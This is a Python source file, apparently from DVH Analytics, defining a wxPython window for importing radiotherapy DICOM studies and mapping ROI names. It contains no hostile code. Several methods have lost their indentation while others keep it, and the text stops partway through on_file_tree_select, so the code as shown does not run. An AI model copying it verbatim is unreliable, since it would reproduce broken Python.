import wx.adv
from wx.lib.agw.customtreectrl import (
CustomTreeCtrl,
TR_AUTO_CHECK_CHILD,
TR_AUTO_CHECK_PARENT,
TR_DEFAULT_STYLE,
)
from datetime import date as datetime_obj, datetime
from dateutil.parser import parse as parse_date
from os import listdir, remove
from os.path import isdir, join
from pubsub import pub
from multiprocessing import Pool
from threading import Thread
from queue import Queue
from functools import partial
from dvha.db import update as db_update
from dvha.db.sql_connector import DVH_SQL, write_test as sql_write_test
from dvha.models.dicom_tree_builder import (
DicomTreeBuilder,
PreImportFileSetParserWorker,
)
from dvha.db.dicom_parser import DICOM_Parser, PreImportData
from dvha.dialogs.main import DatePicker
from dvha.dialogs.roi_map import (
AddPhysician,
AddPhysicianROI,
DelPhysicianROI,
AssignVariation,
DelVariation,
AddROIType,
RoiManager,
ChangePlanROIName,
)
from dvha.models.data_table import DataTable
from dvha.models.roi_map import RemapROIFrame
from dvha.paths import ICONS, TEMP_DIR
from dvha.tools.dicom_dose_sum import DoseGrid
from dvha.tools.errors import ErrorDialog, push_to_log
from dvha.tools.roi_name_manager import clean_name
from dvha.tools.utilities import (
datetime_to_date_string,
get_elapsed_time,
move_files_to_new_path,
rank_ptvs_by_D95,
set_msw_background_color,
is_windows,
get_tree_ctrl_image,
remove_empty_sub_folders,
get_window_size,
set_frame_icon,
PopupMenu,
MessageDialog,
get_new_uids_by_directory,
edit_study_uid,
)
from dvha.tools.threading_progress import ProgressFrame
class ImportDicomFrame(wx.Frame):
"""
Class used to generate the DICOM import GUI
"""
    def __init__(self, roi_map, options, inbox=None, auto_parse=False):
        """
        :param roi_map: roi_map object
        :type roi_map: DatabaseROIs
        :param options: user options object
        :type options: Options
        :param inbox: set the inbox, defaults to value in options if None
        :param auto_parse: if True, parse the inbox immediately on launch
        :type auto_parse: bool
        """
        wx.Frame.__init__(self, None, title="Import DICOM")
        set_frame_icon(self)
        set_msw_background_color(
            self
        )  # If windows, change the background color

        self.options = options
        self.auto_parse = auto_parse
        self.inbox = inbox

        # Make sure the SQL tables exist before any import work begins
        with DVH_SQL() as cnx:
            cnx.initialize_database()

        self.SetSize(get_window_size(0.804, 0.762))

        self.parsed_dicom_data = {}  # maps plan uid -> parsed DICOM data
        self.selected_uid = None

        self.roi_map = roi_map
        self.selected_roi = None

        self.start_path = self.options.INBOX_DIR

        # Paired checkboxes per plan field: "<key>_1" applies the value to
        # all studies, "<key>_2" restricts that to studies missing a value.
        self.checkbox = {}
        keys = [
            "birth_date",
            "sim_study_date",
            "physician",
            "tx_site",
            "rx_dose",
        ]
        for key in keys:
            self.checkbox["%s_1" % key] = wx.CheckBox(
                self, wx.ID_ANY, "Apply to all studies"
            )
            self.checkbox["%s_2" % key] = wx.CheckBox(
                self, wx.ID_ANY, "Only if missing"
            )
        self.global_plan_over_rides = {
            key: {"value": None, "only_if_missing": False} for key in keys
        }

        self.text_ctrl_directory = wx.TextCtrl(
            self, wx.ID_ANY, "", style=wx.TE_READONLY
        )

        with DVH_SQL() as cnx:
            tx_sites = cnx.get_unique_values("Plans", "tx_site")

        # Plan-level input widgets, keyed by the same field names as above
        self.input = {
            "mrn": wx.TextCtrl(self, wx.ID_ANY, ""),
            "study_instance_uid": wx.TextCtrl(self, wx.ID_ANY, ""),
            "birth_date": wx.TextCtrl(
                self, wx.ID_ANY, "", style=wx.TE_READONLY
            ),
            "sim_study_date": wx.TextCtrl(
                self, wx.ID_ANY, "", style=wx.TE_READONLY
            ),
            "physician": wx.ComboBox(
                self,
                wx.ID_ANY,
                choices=self.roi_map.get_physicians(),
                style=wx.CB_DROPDOWN | wx.CB_READONLY,
            ),
            "tx_site": wx.ComboBox(
                self, wx.ID_ANY, choices=tx_sites, style=wx.CB_DROPDOWN
            ),
            "rx_dose": wx.TextCtrl(self, wx.ID_ANY, ""),
        }
        # 'fx_grp': wx.ComboBox(self, wx.ID_ANY, choices=['1'], style=wx.CB_DROPDOWN | wx.CB_READONLY)}
        self.input["physician"].SetValue("")
        self.input["tx_site"].SetValue("")
        # self.input['fx_grp'].SetValue('1')
        self.button_edit_sim_study_date = wx.Button(self, wx.ID_ANY, "Edit")
        self.button_edit_birth_date = wx.Button(self, wx.ID_ANY, "Edit")

        self.button_apply_plan_data = wx.Button(self, wx.ID_ANY, "Apply")
        self.button_delete_study = wx.Button(
            self, wx.ID_ANY, "Delete Study in Database with this UID"
        )
        self.button_delete_study.Disable()
        self.button_add_physician = wx.Button(self, wx.ID_ANY, "Add")

        self.button_browse = wx.Button(self, wx.ID_ANY, u"Browse…")
        self.checkbox_subfolders = wx.CheckBox(
            self, wx.ID_ANY, "Search within sub-folders"
        )
        self.checkbox_keep_in_inbox = wx.CheckBox(
            self, wx.ID_ANY, "Leave files in inbox"
        )
        self.checkbox_copy_misc_files = wx.CheckBox(
            self, wx.ID_ANY, "Copy images/misc DICOM"
        )
        self.panel_study_tree = wx.Panel(
            self, wx.ID_ANY, style=wx.BORDER_SUNKEN
        )
        self.button_import = wx.Button(self, wx.ID_ANY, "Import")
        self.button_cancel = wx.Button(self, wx.ID_CANCEL, "Cancel")
        self.button_save_roi_map = wx.Button(self, wx.ID_ANY, "Save ROI Map")
        self.button_preprocess = wx.Button(
            self, wx.ID_ANY, "Pre-Process DICOM"
        )

        self.panel_roi_tree = wx.Panel(self, wx.ID_ANY, style=wx.BORDER_SUNKEN)
        # ROI-level mapping inputs for the currently selected ROI
        self.input_roi = {
            "physician": wx.ComboBox(
                self,
                wx.ID_ANY,
                choices=[],
                style=wx.CB_DROPDOWN | wx.CB_READONLY,
            ),
            "type": wx.ComboBox(
                self,
                wx.ID_ANY,
                choices=self.options.ROI_TYPES,
                style=wx.CB_DROPDOWN,
            ),
        }
        self.input_roi["type"].SetValue("")
        self.button_roi_manager = wx.Button(self, wx.ID_ANY, "ROI Manager")
        self.button_save_roi_type_in_map = wx.Button(
            self, wx.ID_ANY, "Store in ROI Map"
        )

        # Inputs stay disabled until a complete study is selected
        self.enable_inputs(False)
        self.disable_roi_inputs()

        styles = TR_AUTO_CHECK_CHILD | TR_AUTO_CHECK_PARENT | TR_DEFAULT_STYLE
        self.tree_ctrl_import = CustomTreeCtrl(
            self.panel_study_tree, wx.ID_ANY, agwStyle=styles
        )
        self.tree_ctrl_import.SetBackgroundColour(wx.WHITE)

        self.tree_ctrl_roi = CustomTreeCtrl(
            self.panel_roi_tree, wx.ID_ANY, agwStyle=TR_DEFAULT_STYLE
        )
        self.tree_ctrl_roi.SetBackgroundColour(wx.WHITE)
        self.tree_ctrl_roi_root = self.tree_ctrl_roi.AddRoot(
            "RT Structures (right-click an ROI to edit)", ct_type=0
        )

        self.checkbox_include_uncategorized = wx.CheckBox(
            self, wx.ID_ANY, "Import uncategorized ROIs"
        )
        self.checkbox_auto_sum_dose = wx.CheckBox(
            self, wx.ID_ANY, "Sum all dose grids in a study"
        )

        # Guards on_apply_roi while combos are set programmatically
        self.allow_input_roi_apply = False

        self.__do_bind()
        self.__set_properties()
        self.__do_layout()
        self.__do_subscribe()

        self.is_all_data_parsed = False
        self.dicom_importer = None

        self.incomplete_studies = []

        self.PreprocessDicom = None

        self.run()
def __do_subscribe(self):
"""After DICOM directory is scanned and sorted, parse_dicom_data will be called"""
pub.subscribe(self.parse_dicom_data, "parse_dicom_data")
pub.subscribe(
self.set_pre_import_parsed_dicom_data,
"set_pre_import_parsed_dicom_data",
)
pub.subscribe(self.pre_import_complete, "pre_import_complete")
pub.subscribe(self.pre_import_canceled, "pre_import_canceled")
pub.subscribe(self.build_dicom_file_tree, "build_dicom_file_tree")
def __do_bind(self):
self.Bind(wx.EVT_BUTTON, self.on_browse, id=self.button_browse.GetId())
self.Bind(
wx.EVT_TREE_SEL_CHANGED,
self.on_file_tree_select,
id=self.tree_ctrl_import.GetId(),
)
self.Bind(
wx.EVT_TREE_SEL_CHANGED,
self.on_roi_tree_select,
id=self.tree_ctrl_roi.GetId(),
)
self.Bind(
wx.EVT_TREE_ITEM_RIGHT_CLICK,
self.on_roi_tree_right_click,
id=self.tree_ctrl_roi.GetId(),
)
for input_obj in self.input.values():
self.Bind(wx.EVT_TEXT, self.on_text_change, id=input_obj.GetId())
self.Bind(
wx.EVT_BUTTON,
self.on_delete_study,
id=self.button_delete_study.GetId(),
)
self.Bind(
wx.EVT_COMBOBOX,
self.on_text_change,
id=self.input["physician"].GetId(),
)
self.Bind(
wx.EVT_COMBOBOX,
self.on_text_change,
id=self.input["tx_site"].GetId(),
)
self.Bind(
wx.EVT_BUTTON,
self.on_apply_plan,
id=self.button_apply_plan_data.GetId(),
)
self.Bind(
wx.EVT_COMBOBOX,
self.on_apply_roi,
id=self.input_roi["type"].GetId(),
)
self.Bind(
wx.EVT_COMBOBOX,
self.on_apply_roi,
id=self.input_roi["physician"].GetId(),
)
for key in [
"birth_date",
"sim_study_date",
"physician",
"tx_site",
"rx_dose",
]:
self.Bind(
wx.EVT_CHECKBOX,
self.on_check_apply_all,
id=self.checkbox["%s_1" % key].GetId(),
)
self.Bind(
wx.EVT_CHECKBOX,
self.on_check_apply_all,
id=self.checkbox["%s_2" % key].GetId(),
)
self.Bind(
wx.EVT_BUTTON,
self.on_edit_birth_date,
id=self.button_edit_birth_date.GetId(),
)
self.Bind(
wx.EVT_BUTTON,
self.on_edit_sim_study_date,
id=self.button_edit_sim_study_date.GetId(),
)
self.Bind(
wx.EVT_BUTTON,
self.on_add_physician,
id=self.button_add_physician.GetId(),
)
self.Bind(wx.EVT_BUTTON, self.on_import, id=self.button_import.GetId())
self.Bind(wx.EVT_BUTTON, self.on_cancel, id=self.button_cancel.GetId())
self.Bind(
wx.EVT_BUTTON,
self.on_save_roi_map,
id=self.button_save_roi_map.GetId(),
)
self.Bind(
wx.EVT_BUTTON,
self.on_preprocess,
id=self.button_preprocess.GetId(),
)
self.Bind(
wx.EVT_BUTTON,
self.on_roi_manager,
id=self.button_roi_manager.GetId(),
)
self.Bind(
wx.EVT_COMBOBOX,
self.on_physician_roi_change,
id=self.input_roi["physician"].GetId(),
)
self.Bind(wx.EVT_CLOSE, self.on_cancel)
self.Bind(
wx.EVT_BUTTON,
self.on_save_roi_type_in_map,
id=self.button_save_roi_type_in_map.GetId(),
)
def __set_properties(self):
self.checkbox_subfolders.SetFont(
wx.Font(
11,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL,
0,
"",
)
)
value = (
self.options.SEARCH_SUBFOLDERS
if hasattr(self.options, "SEARCH_SUBFOLDERS")
else 1
)
self.checkbox_subfolders.SetValue(value)
self.checkbox_keep_in_inbox.SetFont(
wx.Font(
11,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL,
0,
"",
)
)
self.checkbox_keep_in_inbox.SetToolTip(
"Successfully imported DICOM files will either be copied or moved into "
"your Imported Directory. Check this box to copy. Uncheck this box to "
"remove these files from the inbox."
)
value = (
self.options.KEEP_IN_INBOX
if hasattr(self.options, "KEEP_IN_INBOX")
else 0
)
self.checkbox_keep_in_inbox.SetValue(value)
self.checkbox_copy_misc_files.SetFont(
wx.Font(
11,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL,
0,
"",
)
)
self.checkbox_copy_misc_files.SetToolTip(
"Uncheck to only copy DICOM-RT Dose, Structure and Plan files to DVH imported directory."
)
value = (
self.options.COPY_MISC_FILES
if hasattr(self.options, "COPY_MISC_FILES")
else 0
)
self.checkbox_copy_misc_files.SetValue(value)
self.checkbox_include_uncategorized.SetFont(
wx.Font(
11,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL,
0,
"",
)
)
self.checkbox_auto_sum_dose.SetFont(
wx.Font(
11,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL,
0,
"",
)
)
value = (
self.options.IMPORT_UNCATEGORIZED
if hasattr(self.options, "IMPORT_UNCATEGORIZED")
else 0
)
self.checkbox_include_uncategorized.SetValue(value)
value = (
self.options.AUTO_SUM_DOSE
if hasattr(self.options, "AUTO_SUM_DOSE")
else 1
)
self.checkbox_auto_sum_dose.SetValue(value)
self.checkbox_auto_sum_dose.SetToolTip(
"If multiple dose grids are found for one patient, dose grids will be "
"summed and composite DVHs will be stored. "
"This is typically recommended."
)
for checkbox in self.checkbox.values():
checkbox.SetFont(
wx.Font(
11,
wx.FONTFAMILY_DEFAULT,
wx.FONTSTYLE_NORMAL,
wx.FONTWEIGHT_NORMAL,
0,
"",
)
)
self.image_list = wx.ImageList(16, 16)
self.tree_ctrl_images = {
"yes": self.image_list.Add(get_tree_ctrl_image(ICONS["ok-green"])),
"no": self.image_list.Add(get_tree_ctrl_image(ICONS["ko-red"])),
}
self.tree_ctrl_roi.AssignImageList(self.image_list)
self.button_cancel.SetToolTip(
"Cancel and do not save ROI Map changes since last save."
)
self.button_import.SetToolTip(
"Save ROI Map changes and import checked studies."
)
self.button_save_roi_map.SetToolTip("Save ROI Map changes.")
    def __do_layout(self):
        """Build the sizer hierarchy: three side-by-side columns (browse/tree,
        plan data, ROI map) over a warning/button row."""
        labels = {
            "mrn": "MRN:",
            "study_instance_uid": "Study Instance UID:",
            "birth_date": "Birthdate:",
            "sim_study_date": "Sim Study Date:",
            "physician": "Physician:",
            "tx_site": "Tx Site:",
            "rx_dose": "Rx Dose (Gy):",
            "physician_roi": "Physician's ROI Label:",
            "roi_type": "ROI Type:",
        }
        self.label = {
            key: wx.StaticText(self, wx.ID_ANY, label)
            for key, label in labels.items()
        }

        # Sizer declarations (nesting is established by the Add calls below)
        sizer_wrapper = wx.BoxSizer(wx.VERTICAL)
        sizer_buttons = wx.BoxSizer(wx.HORIZONTAL)
        sizer_warning = wx.BoxSizer(wx.HORIZONTAL)
        sizer_warning_buttons = wx.BoxSizer(wx.HORIZONTAL)
        sizer_main = wx.BoxSizer(wx.HORIZONTAL)
        sizer_roi_map_wrapper = wx.BoxSizer(wx.HORIZONTAL)
        sizer_roi_map = wx.StaticBoxSizer(
            wx.StaticBox(self, wx.ID_ANY, "ROI Mapping for Selected Study"),
            wx.VERTICAL,
        )
        sizer_selected_roi = wx.StaticBoxSizer(
            wx.StaticBox(self, wx.ID_ANY, "Map for Selected ROI"), wx.VERTICAL
        )
        sizer_roi_type = wx.BoxSizer(wx.VERTICAL)
        sizer_physician_roi = wx.BoxSizer(wx.VERTICAL)
        sizer_roi_tree = wx.BoxSizer(wx.HORIZONTAL)
        sizer_plan_data_wrapper = wx.BoxSizer(wx.HORIZONTAL)
        sizer_plan_data = wx.StaticBoxSizer(
            wx.StaticBox(self, wx.ID_ANY, "Plan Data for Selected Study"),
            wx.VERTICAL,
        )
        sizer_rx = wx.StaticBoxSizer(
            wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
        )
        sizer_rx_fx_grp_input = wx.BoxSizer(wx.HORIZONTAL)
        sizer_rx_input = wx.BoxSizer(wx.VERTICAL)
        # sizer_fx_grp_input = wx.BoxSizer(wx.VERTICAL)
        sizer_checkbox_rx = wx.BoxSizer(wx.HORIZONTAL)
        sizer_tx_site = wx.StaticBoxSizer(
            wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
        )
        sizer_tx_site_checkbox = wx.BoxSizer(wx.HORIZONTAL)
        sizer_physician = wx.StaticBoxSizer(
            wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
        )
        sizer_physician_input = wx.BoxSizer(wx.VERTICAL)
        sizer_physician_input_and_button = wx.BoxSizer(wx.HORIZONTAL)
        sizer_physician_checkbox = wx.BoxSizer(wx.HORIZONTAL)
        sizer_sim_study_date = wx.StaticBoxSizer(
            wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
        )
        sizer_sim_study_date_text_button = wx.BoxSizer(wx.HORIZONTAL)
        sizer_sim_study_date_checkbox = wx.BoxSizer(wx.HORIZONTAL)
        sizer_birth_date = wx.StaticBoxSizer(
            wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
        )
        sizer_birth_date_text_button = wx.BoxSizer(wx.HORIZONTAL)
        sizer_birth_date_checkbox = wx.BoxSizer(wx.HORIZONTAL)
        sizer_uid = wx.StaticBoxSizer(
            wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
        )
        sizer_mrn = wx.StaticBoxSizer(
            wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
        )
        sizer_browse_and_tree = wx.BoxSizer(wx.VERTICAL)
        sizer_studies = wx.StaticBoxSizer(
            wx.StaticBox(self, wx.ID_ANY, "Studies"), wx.VERTICAL
        )
        sizer_studies_checkboxes = wx.BoxSizer(wx.HORIZONTAL)
        sizer_progress = wx.BoxSizer(wx.HORIZONTAL)
        sizer_tree = wx.BoxSizer(wx.HORIZONTAL)
        sizer_dicom_import_directory = wx.StaticBoxSizer(
            wx.StaticBox(self, wx.ID_ANY, "DICOM Import Directory"),
            wx.VERTICAL,
        )
        sizer_directory = wx.BoxSizer(wx.VERTICAL)
        sizer_import_checkboxes = wx.BoxSizer(wx.HORIZONTAL)
        sizer_browse = wx.BoxSizer(wx.HORIZONTAL)

        # Left column: directory browse controls plus the study tree
        sizer_browse.Add(self.text_ctrl_directory, 1, wx.ALL | wx.EXPAND, 5)
        sizer_browse.Add(self.button_browse, 0, wx.ALL, 5)
        sizer_directory.Add(sizer_browse, 1, wx.EXPAND, 0)
        sizer_import_checkboxes.Add(self.checkbox_subfolders, 0, wx.LEFT, 10)
        sizer_import_checkboxes.Add(
            self.checkbox_keep_in_inbox, 0, wx.LEFT, 10
        )
        sizer_directory.Add(sizer_import_checkboxes, 1, wx.EXPAND, 0)
        sizer_directory.Add(self.checkbox_copy_misc_files, 0, wx.LEFT, 10)
        sizer_dicom_import_directory.Add(sizer_directory, 1, wx.EXPAND, 0)
        sizer_browse_and_tree.Add(
            sizer_dicom_import_directory, 0, wx.ALL | wx.EXPAND, 10
        )
        label_note = wx.StaticText(
            self,
            wx.ID_ANY,
            "NOTE: Only the latest files for a plan-set will be used/shown.",
        )
        label_note.SetFont(
            wx.Font(
                10,
                wx.FONTFAMILY_DEFAULT,
                wx.FONTSTYLE_NORMAL,
                wx.FONTWEIGHT_NORMAL,
                0,
                "",
            )
        )
        sizer_studies.Add(label_note, 0, wx.ALL, 5)
        sizer_tree.Add(self.tree_ctrl_import, 1, wx.EXPAND, 0)
        self.panel_study_tree.SetSizer(sizer_tree)
        sizer_studies.Add(self.panel_study_tree, 1, wx.ALL | wx.EXPAND, 5)
        sizer_studies_checkboxes.Add(
            self.checkbox_include_uncategorized, 0, wx.RIGHT, 10
        )
        sizer_studies_checkboxes.Add(self.checkbox_auto_sum_dose, 0, 0, 0)
        sizer_studies.Add(sizer_studies_checkboxes, 0, wx.LEFT | wx.EXPAND, 10)
        self.label_progress = wx.StaticText(self, wx.ID_ANY, "")
        self.label_progress.SetFont(
            wx.Font(
                11,
                wx.FONTFAMILY_DEFAULT,
                wx.FONTSTYLE_NORMAL,
                wx.FONTWEIGHT_NORMAL,
                0,
                "",
            )
        )
        sizer_progress.Add(self.label_progress, 1, wx.ALL, 10)
        sizer_studies.Add(sizer_progress, 0, wx.EXPAND | wx.RIGHT, 5)
        sizer_browse_and_tree.Add(
            sizer_studies, 1, wx.BOTTOM | wx.EXPAND | wx.LEFT | wx.RIGHT, 10
        )
        sizer_main.Add(sizer_browse_and_tree, 1, wx.EXPAND, 0)

        # Middle column: per-study plan data fields
        sizer_mrn.Add(self.label["mrn"], 0, 0, 0)
        sizer_mrn.Add(self.input["mrn"], 0, wx.EXPAND, 0)
        sizer_plan_data.Add(sizer_mrn, 1, wx.ALL | wx.EXPAND, 5)
        sizer_uid.Add(self.label["study_instance_uid"], 0, 0, 0)
        sizer_uid.Add(self.input["study_instance_uid"], 0, wx.EXPAND, 0)
        sizer_uid.Add(self.button_delete_study, 0, wx.ALL | wx.ALIGN_CENTER, 5)
        sizer_plan_data.Add(sizer_uid, 1, wx.ALL | wx.EXPAND, 5)
        sizer_birth_date.Add(self.label["birth_date"], 0, 0, 0)
        sizer_birth_date_text_button.Add(self.input["birth_date"], 0, 0, 0)
        sizer_birth_date_text_button.Add(
            self.button_edit_birth_date, 0, wx.LEFT, 10
        )
        sizer_birth_date_checkbox.Add(
            self.checkbox["birth_date_1"], 0, wx.RIGHT, 20
        )
        sizer_birth_date_checkbox.Add(self.checkbox["birth_date_2"], 0, 0, 0)
        sizer_birth_date.Add(sizer_birth_date_text_button, 0, 0, 0)
        sizer_birth_date.Add(sizer_birth_date_checkbox, 1, wx.EXPAND, 0)
        sizer_plan_data.Add(sizer_birth_date, 1, wx.ALL | wx.EXPAND, 5)
        sizer_sim_study_date.Add(self.label["sim_study_date"], 0, 0, 0)
        sizer_sim_study_date_text_button.Add(
            self.input["sim_study_date"], 0, 0, 0
        )
        sizer_sim_study_date_text_button.Add(
            self.button_edit_sim_study_date, 0, wx.LEFT, 10
        )
        sizer_sim_study_date_checkbox.Add(
            self.checkbox["sim_study_date_1"], 0, wx.RIGHT, 20
        )
        sizer_sim_study_date_checkbox.Add(
            self.checkbox["sim_study_date_2"], 0, 0, 0
        )
        sizer_sim_study_date.Add(sizer_sim_study_date_text_button, 0, 0, 0)
        sizer_sim_study_date.Add(
            sizer_sim_study_date_checkbox, 1, wx.EXPAND, 0
        )
        sizer_plan_data.Add(sizer_sim_study_date, 1, wx.ALL | wx.EXPAND, 5)
        sizer_physician_input.Add(self.label["physician"], 0, 0, 0)
        sizer_physician_input_and_button.Add(self.input["physician"], 0, 0, 0)
        sizer_physician_input_and_button.Add(
            self.button_add_physician, 0, wx.LEFT, 5
        )
        sizer_physician_checkbox.Add(
            self.checkbox["physician_1"], 0, wx.RIGHT, 20
        )
        sizer_physician_checkbox.Add(self.checkbox["physician_2"], 0, 0, 0)
        sizer_physician.Add(sizer_physician_input, 0, 0, 0)
        sizer_physician.Add(sizer_physician_input_and_button, 0, wx.EXPAND, 0)
        sizer_physician.Add(sizer_physician_checkbox, 1, wx.EXPAND, 0)
        sizer_plan_data.Add(sizer_physician, 1, wx.ALL | wx.EXPAND, 5)
        sizer_tx_site.Add(self.label["tx_site"], 0, 0, 0)
        sizer_tx_site.Add(self.input["tx_site"], 0, wx.EXPAND, 0)
        sizer_tx_site_checkbox.Add(self.checkbox["tx_site_1"], 0, wx.RIGHT, 20)
        sizer_tx_site_checkbox.Add(self.checkbox["tx_site_2"], 0, 0, 0)
        sizer_tx_site.Add(sizer_tx_site_checkbox, 1, wx.EXPAND, 0)
        sizer_plan_data.Add(sizer_tx_site, 1, wx.ALL | wx.EXPAND, 5)
        # self.label['fx_grp'] = wx.StaticText(self, wx.ID_ANY, "Fx Group:")
        sizer_rx_input.Add(self.label["rx_dose"], 0, 0, 0)
        sizer_rx_input.Add(self.input["rx_dose"], 0, 0, 0)
        # sizer_fx_grp_input.Add(self.label['fx_grp'], 0, wx.LEFT, 20)
        # sizer_fx_grp_input.Add(self.input['fx_grp'], 0, wx.LEFT, 20)
        sizer_rx_fx_grp_input.Add(sizer_rx_input, 0, 0, 0)
        # sizer_rx_fx_grp_input.Add(sizer_fx_grp_input, 0, 0, 0)
        sizer_rx.Add(sizer_rx_fx_grp_input, 0, 0, 0)
        sizer_checkbox_rx.Add(self.checkbox["rx_dose_1"], 0, wx.RIGHT, 20)
        sizer_checkbox_rx.Add(self.checkbox["rx_dose_2"], 0, 0, 0)
        sizer_rx.Add(sizer_checkbox_rx, 1, wx.EXPAND, 0)
        sizer_plan_data.Add(sizer_rx, 1, wx.ALL | wx.EXPAND, 5)
        sizer_plan_data.Add(
            self.button_apply_plan_data, 0, wx.ALL | wx.EXPAND, 5
        )
        sizer_plan_data_wrapper.Add(sizer_plan_data, 1, wx.ALL | wx.EXPAND, 10)
        sizer_main.Add(sizer_plan_data_wrapper, 1, wx.EXPAND, 0)

        # Right column: ROI tree and per-ROI mapping inputs
        sizer_roi_tree.Add(self.tree_ctrl_roi, 1, wx.ALL | wx.EXPAND, 0)
        self.panel_roi_tree.SetSizer(sizer_roi_tree)
        sizer_roi_map.Add(self.panel_roi_tree, 1, wx.EXPAND, 0)
        sizer_roi_map.Add(self.button_roi_manager, 0, wx.EXPAND | wx.ALL, 5)
        sizer_physician_roi_with_add = wx.BoxSizer(wx.HORIZONTAL)
        sizer_physician_roi.Add(self.label["physician_roi"], 0, 0, 0)
        sizer_physician_roi.Add(self.input_roi["physician"], 0, wx.EXPAND, 0)
        sizer_physician_roi_with_add.Add(sizer_physician_roi, 1, wx.EXPAND, 0)
        sizer_roi_type_with_add = wx.BoxSizer(wx.HORIZONTAL)
        sizer_roi_type_store_in_map = wx.BoxSizer(wx.VERTICAL)
        sizer_roi_type.Add(self.label["roi_type"], 0, 0, 0)
        sizer_roi_type.Add(self.input_roi["type"], 0, wx.EXPAND, 0)
        sizer_roi_type_store_in_map.Add((20, 18), 0, 0, 0)
        sizer_roi_type_store_in_map.Add(
            self.button_save_roi_type_in_map,
            0,
            wx.EXPAND | wx.LEFT | wx.RIGHT,
            5,
        )
        sizer_roi_type_with_add.Add(sizer_roi_type, 1, wx.EXPAND, 0)
        sizer_roi_type_with_add.Add(
            sizer_roi_type_store_in_map, 0, wx.EXPAND, 0
        )
        sizer_selected_roi.Add(
            sizer_physician_roi_with_add, 1, wx.ALL | wx.EXPAND, 5
        )
        sizer_selected_roi.Add(
            sizer_roi_type_with_add, 1, wx.ALL | wx.EXPAND, 5
        )
        sizer_roi_map.Add(sizer_selected_roi, 0, wx.EXPAND, 0)
        sizer_roi_map_wrapper.Add(sizer_roi_map, 1, wx.ALL | wx.EXPAND, 10)
        sizer_main.Add(sizer_roi_map_wrapper, 1, wx.EXPAND, 0)
        sizer_wrapper.Add(sizer_main, 1, wx.EXPAND, 0)

        # Bottom row: warning text plus the action buttons
        self.label_warning = wx.StaticText(self, wx.ID_ANY, "")
        sizer_warning.Add(self.label_warning, 1, wx.EXPAND, 0)
        sizer_warning_buttons.Add(sizer_warning, 1, wx.ALL | wx.EXPAND, 5)
        # sizer_buttons.Add(self.button_assign_ptv_test, 0, wx.ALL, 5)
        sizer_buttons.Add(self.button_preprocess, 0, wx.ALL, 5)
        sizer_buttons.Add(self.button_save_roi_map, 0, wx.ALL, 5)
        sizer_buttons.Add(self.button_import, 0, wx.ALL, 5)
        sizer_buttons.Add(self.button_cancel, 0, wx.ALL, 5)
        sizer_warning_buttons.Add(
            sizer_buttons, 0, wx.BOTTOM | wx.LEFT | wx.RIGHT, 5
        )
        sizer_wrapper.Add(sizer_warning_buttons, 0, wx.ALL | wx.EXPAND, 5)
        self.SetSizer(sizer_wrapper)
        self.Layout()
        self.Center()
def run(self):
self.Show()
if self.inbox is not None and isdir(self.inbox):
inbox = self.inbox
elif isdir(self.options.INBOX_DIR):
inbox = self.options.INBOX_DIR
else:
inbox = ""
self.text_ctrl_directory.SetValue(inbox)
if self.auto_parse:
self.dicom_importer = self.get_importer()
def on_cancel(self, evt):
self.roi_map.import_from_file() # reload from file, ignore changes
# pub.unsubscribe(self.parse_dicom_data, "parse_dicom_data")
# pub.unsubscribe(self.set_pre_import_parsed_dicom_data, 'set_pre_import_parsed_dicom_data')
# pub.unsubscribe(self.pre_import_complete, "pre_import_complete")
pub.sendMessage("import_dicom_cancel")
self.do_unsubscribe()
self.Destroy()
@staticmethod
def do_unsubscribe():
pub.unsubAll(topicName="parse_dicom_data")
pub.unsubAll(topicName="set_pre_import_parsed_dicom_data")
pub.unsubAll(topicName="pre_import_complete")
pub.unsubAll(topicName="pre_import_canceled")
pub.unsubAll(topicName="build_dicom_file_tree")
    def on_save_roi_map(self, evt):
        """Open the ROI map remap/save frame for the current roi_map."""
        RemapROIFrame(self.roi_map)
    def on_preprocess(self, evt):
        """Launch the DICOM pre-processing window, keeping a reference on self."""
        self.PreprocessDicom = PreprocessDicom(self)
def on_browse(self, evt):
"""
Clear data, open a DirDialog, run a DicomTreeBuilder on selected directory
"""
starting_dir = self.text_ctrl_directory.GetValue()
if starting_dir == "":
starting_dir = self.start_path
if not isdir(starting_dir):
starting_dir = ""
dlg = wx.DirDialog(
self,
"Select inbox directory",
starting_dir,
wx.DD_DEFAULT_STYLE | wx.DD_DIR_MUST_EXIST,
)
if dlg.ShowModal() == wx.ID_OK:
self.build_dicom_file_tree(dlg.GetPath())
def build_dicom_file_tree(self, directory):
self.parsed_dicom_data = {}
for key in list(self.global_plan_over_rides):
self.global_plan_over_rides[key] = {
"value": None,
"only_if_missing": False,
}
self.clear_plan_data()
if self.dicom_importer:
self.tree_ctrl_roi.DeleteChildren(self.dicom_importer.root_rois)
self.text_ctrl_directory.SetValue(directory)
self.dicom_importer = self.get_importer()
self.PreprocessDicom = None
    def get_importer(self):
        """Create a DicomTreeBuilder for the current directory and tree ctrls."""
        return DicomTreeBuilder(
            self.text_ctrl_directory.GetValue(),
            self.tree_ctrl_import,
            self.tree_ctrl_roi,
            self.tree_ctrl_roi_root,
            self.tree_ctrl_images,
            self.roi_map,
            search_subfolders=self.checkbox_subfolders.GetValue(),
        )
def on_file_tree_select(self, evt):
"""
On selection of an item in the file tree, update the plan dependent elements of the Frame
"""
uid = self.get_file_tree_item_plan_uid(evt.GetItem())
self.tree_ctrl_roi.SelectItem(self.tree_ctrl_roi_root, True)
if (
uid in list(self.parsed_dicom_data)
and self.parsed_dicom_data[uid].validation["complete_file_set"]
):
if uid != self.selected_uid:
self.selected_uid = uid
wx.BeginBusyCursor()
self.dicom_importer.rebuild_tree_ctrl_rois(uid)
self.tree_ctrl_roi.ExpandAll()
